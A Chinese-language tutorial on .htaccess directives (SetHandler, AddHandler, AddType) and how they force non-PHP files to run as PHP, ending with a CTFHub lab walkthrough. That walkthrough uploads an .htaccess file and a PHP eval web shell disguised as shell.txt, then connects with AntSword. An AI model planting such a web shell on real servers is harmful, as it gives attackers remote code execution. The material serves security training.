文件上传

.htaccess

定义：

htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。

.htaccess主要的作用有：URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。

作用范围：

.htaccess的用途范围主要针对当前目录。

Apache在处理多个 .htaccess 文件时，会依次从上级目录到子目录进行处理，遵循继承(请求涉及到子目录，那么父目录的 .htaccess 文件会首先生效，然后是子目录的 .htaccess 文件)的原则，但如果存在规则冲突，后面的规则会覆盖前面的规则。

启动 .htaccess:

在httpd.conf文件下将AllowOverride none改为

AllowOverride  ALL # 启动.htaccess文件的使用

.htaccess 常见指令：

.htaccess可以实现网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

SetHandler

SetHandler 指令可以强制所有匹配的文件被一个指定的处理器处理。

•用法：

SetHandler handler-name|None

•示例 1：

SetHandler application/x-httpd-php

此时当前目录及其子目录下所有文件都会被当做 php 解析。

AddHandler

AddHandler 指令可以实现在文件扩展名与特定的处理器之间建立映射。

•用法：

AddHandler handler-name extensive [extensive] ...

复制

•示例：

AddHandler cgi-script .xxx

复制

即将扩展名为 .xxx 的文件作为 CGI 脚本来处理。

AddType

AddType 指令可以将给定的文件扩展名映射到指定的内容类型。

•用法：

AddType media-type extensive [extensive] ...

•示例 1：

AddType application/x-httpd-php .gif

此时将会把 gif 为后缀的文件当做 php 文件解析。

•示例 2：

AddType application/x-httpd-php png jpg gif

此时将会把 .png .jpg .gif 多个后缀的文件当做 php 解析。

靶场：ctfhub 技能树 .htaccess

将文件名修改为.htaccess

#将txt文件解析为PHP文件执行
AddType application/x-httpd-php .txt

shell.txt

<?php 
echo "PHP Loaded";
eval(@$_POST['a']);
?>

先后上传，然后用蚁剑连接后台